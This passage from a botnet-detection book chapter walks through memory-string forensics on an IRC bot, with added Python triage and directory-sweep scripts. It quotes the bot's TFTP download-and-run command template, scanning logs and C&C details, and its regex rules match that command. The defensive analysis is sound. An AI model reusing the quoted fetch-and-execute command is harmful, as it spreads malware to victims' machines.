botherder to locate where he had put the components of his malware. This proved useful on all subsequent searches. As we have mentioned a few times, the .ini files provided intelligence data about ports and IP addresses to watch.
In the Process Explorer results we noted an application running called iexplorer.exe. Using the Strings tab in Process Explorer, we can look at the image of the process either on the hard drive or in memory. Rbot uses packaging to encrypt/encode itself on the hard drive, so the image on the hard drive doesn't yield much. However, when the process executes, it must unpack itself. The Strings tab in memory is a goldmine. Table 5.8 shows some information extracted from the strings in memory.
Table 5.8 Strings in Memory Sample 1

tftp -i %s get %s& start %s& exit
-[ModBot]-
Skonk-[ModBot]-Small-V0.4
iexplorer.exe
sysconfig.dat
Microsoft
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
Software\\Microsoft\\OLE
Software\\ASProtect
bong
#sym
#sym
#sym
12 120|MoD
12 ScAnAgE
12 RoOtAgE
snake@10.100.25.201
Ime A F*ck U Bot-And Ime Here To F*ck U Up
D CKFDENECFDEFFCFGEFFCCACACACACACA
EKEDFEEIEDCACACACACACACACACACAAA
If there was any doubt before, the third line from the bottom should be convincing evidence for even the biggest skeptic. This is definitely a bot. Now let's look at a second example (see Table 5.9).
Botnet Detection: Tools and Techniques • Chapter 5
Table 5.9 Strings in Memory Sample 2

Server started on Port: 0, File: C:\WINDOWS\system32\iexplorer.exe, Request: iexplorer.exe.
IP: 192.168.5.125:139, Scan thread: 1, Sub-thread: 1.
IP: 192.168.169.101:139, Scan thread: 1, Sub-thread: 2
IP: 192.168.221.197:139, Scan thread: 1, Sub-thread: 3.
IP: 192.168.174.2:139, Scan thread: 1, Sub-thread: 4.
IP: 192.168.225.65:139, Scan thread: 1, Sub-thread: 5.
IP: 192.168.245.108:139, Scan thread: 1, Sub-thread: 6.
The bot has begun to scan the class B network for a system with port 139 open. The bot connected to an IRC channel, #sym. 10.201.209.5 is likely the C&C server (see Table 5.10).
Table 5.10 Memory Strings Sample: An IRC Connection

[12-25-2006 06:42:24] Joined channel: #sym
[12-25-2006 06:42:24] Joined channel: #sym
[12-25-2006 06:42:24] Joined channel: #sym
[12-25-2006 06:42:12] Connected to 10.201.209.5
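The kind of triage shown in Tables 5.8 through 5.10 can be scripted once the in-memory strings have been saved to a text file. The following is an added example, not code from the book: it runs a handful of indicator rules (TFTP self-copy, Run/RunServices persistence keys, IRC channel joins, the "Connected to" server line, and scanner-thread lines) over a constructed sample modelled on the tables, then summarises the C&C host, the channel, the port being probed and the address range the scanner is sweeping. The sample lines and the rule names are the author's constructions, not output of any real tool.

```python
import re
from collections import Counter

# Constructed sample: lines in the shape of what the Process Explorer
# Strings tab shows for the unpacked process (modelled on Tables 5.8-5.10).
SAMPLE_STRINGS = """\
tftp -i %s get %s& start %s& exit
Skonk-[ModBot]-Small-V0.4
iexplorer.exe
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
#sym
snake@10.100.25.201
IP: 192.168.5.125:139, Scan thread: 1, Sub-thread: 1.
IP: 192.168.169.101:139, Scan thread: 1, Sub-thread: 2
[12-25-2006 06:42:12] Connected to 10.201.209.5
[12-25-2006 06:42:24] Joined channel: #sym
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"

# Each rule: (name, compiled regex, what a hit tells the analyst).
RULES = [
    ("tftp_fetch", re.compile(r"\btftp\b.*\bget\b", re.I),
     "self-propagation: pulls a copy of itself onto the next victim via TFTP"),
    ("autorun_key", re.compile(r"CurrentVersion\\Run(?:Services)?\b", re.I),
     "persistence: Run/RunServices registry path present in the image"),
    ("irc_join", re.compile(r"Joined channel:\s*(#\S+)", re.I),
     "IRC C&C: channel the bot joined"),
    ("c2_connect", re.compile(r"Connected to\s+" + IPV4, re.I),
     "IRC C&C: server the bot dialled"),
    ("port_scan", re.compile(r"^IP:\s*" + IPV4 + r":(\d+),\s*Scan thread", re.I),
     "spreading: scanner thread probing a host/port"),
    ("bot_banner", re.compile(r"bot\b", re.I),
     "self-identification string"),
]


def triage_strings(dump: str) -> dict:
    """Run every rule over each non-empty line and summarise what was found."""
    hits, c2_hosts, channels, scan_targets = [], set(), set(), []
    scan_ports = Counter()
    for raw in dump.splitlines():
        line = raw.strip()
        if not line:
            continue
        for name, rx, _meaning in RULES:
            m = rx.search(line)
            if not m:
                continue
            hits.append((name, line))
            if name == "c2_connect":
                c2_hosts.add(m.group(1))
            elif name == "irc_join":
                channels.add(m.group(1))
            elif name == "port_scan":
                scan_targets.append(m.group(1))
                scan_ports[m.group(2)] += 1
    # A server connection plus either a channel join or active scanning is
    # the combination the chapter treats as conclusive.
    verdict = "bot" if c2_hosts and (channels or scan_targets) else "inconclusive"
    return {"hits": hits, "c2_hosts": sorted(c2_hosts),
            "irc_channels": sorted(channels), "scan_targets": scan_targets,
            "scan_ports": dict(scan_ports), "verdict": verdict}


def scanned_range(ips):
    """Longest dotted prefix shared by all scan targets and its bit length,
    e.g. ('192.168', 16) when the scanner is sweeping a whole class B."""
    if not ips:
        return None
    octets = [ip.split(".") for ip in ips]
    shared = []
    for pos in range(4):
        column = {o[pos] for o in octets}
        if len(column) != 1:
            break
        shared.append(column.pop())
    return ".".join(shared), len(shared) * 8


if __name__ == "__main__":
    result = triage_strings(SAMPLE_STRINGS)
    for name, line in result["hits"]:
        print(f"{name:12s} {line}")
    print("C&C:", result["c2_hosts"], "channels:", result["irc_channels"])
    print("scan range:", scanned_range(result["scan_targets"]),
          "ports:", result["scan_ports"], "verdict:", result["verdict"])
```

The rules are deliberately loose (the banner rule only looks for a word ending in "bot"), because a strings dump is noisy and the goal is to surface lines for a human to read, as the chapter does, not to make a fully automated call. Feed it a real saved strings file by replacing SAMPLE_STRINGS with the file's contents.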
After collecting and analyzing the data from these quick forensics, we were able to identify a directory structure that was present on the majority of the infected systems we examined. The base location of the directory structure changed, but it was always present somewhere, whether in the Recycle folder, the Java\Trustlib folder, or elsewhere (see Figure 5.8). When doing the quick forensic we also check for these folders that we have seen before.
If you are in an enterprise and you use a remote management tool like LanDesk Manager or Altiris, you can create a job to run on all managed systems to look for other infected systems by identifying all computers that have this unique directory.
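A job of the kind described above only needs to walk each managed system's disk and report whether the known directory name exists anywhere under it. The following is an added example, not the book's code: a bounded-depth sweep that returns every directory matching a marker name, case-insensitively since Windows file systems are. The name of the bot's directory tree is given in Figure 5.8, which is not reproduced on this page, so MARKER_DIR is a placeholder to replace; the demo tree built by build_demo_tree() is constructed for illustration.

```python
import os
import tempfile

# Placeholder: substitute the directory name from Figure 5.8 before deploying.
MARKER_DIR = "BOT_TREE_PLACEHOLDER"


def find_marker_dirs(root, marker=MARKER_DIR, max_depth=8):
    """Walk `root` and return every directory whose name equals `marker`
    (case-insensitive). Descent stops `max_depth` levels below `root` so a
    fleet-wide job stays cheap even on large disks."""
    found = []
    root = os.path.abspath(root)
    base_depth = root.rstrip(os.sep).count(os.sep)
    for dirpath, dirnames, _files in os.walk(root):
        depth = dirpath.count(os.sep) - base_depth
        for d in dirnames:                      # children sit at depth + 1
            if d.lower() == marker.lower():
                found.append(os.path.join(dirpath, d))
        if depth + 1 >= max_depth:
            dirnames[:] = []                    # prune: go no deeper
    return sorted(found)


def host_is_infected(root, marker=MARKER_DIR):
    """True if the marker directory exists anywhere under `root`."""
    return bool(find_marker_dirs(root, marker))


def build_demo_tree():
    """Constructed sample layout: the marker hidden in two of the locations
    the chapter mentions (a Recycle folder and Java\\Trustlib), plus a clean
    sibling so the sweep has something to pass over."""
    root = tempfile.mkdtemp(prefix="sweep_demo_")
    for rel in (("RECYCLER", MARKER_DIR),
                ("Program Files", "Java", "Trustlib", MARKER_DIR),
                ("Program Files", "Java", "bin")):
        os.makedirs(os.path.join(root, *rel))
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for path in find_marker_dirs(demo_root):
        print("marker directory:", path)
    print("infected:", host_is_infected(demo_root))
```

In a LANDesk or Altiris job you would point find_marker_dirs at each local drive root and have the script's exit status or printed lines feed the tool's reporting, so the console lists exactly the machines that carry the directory.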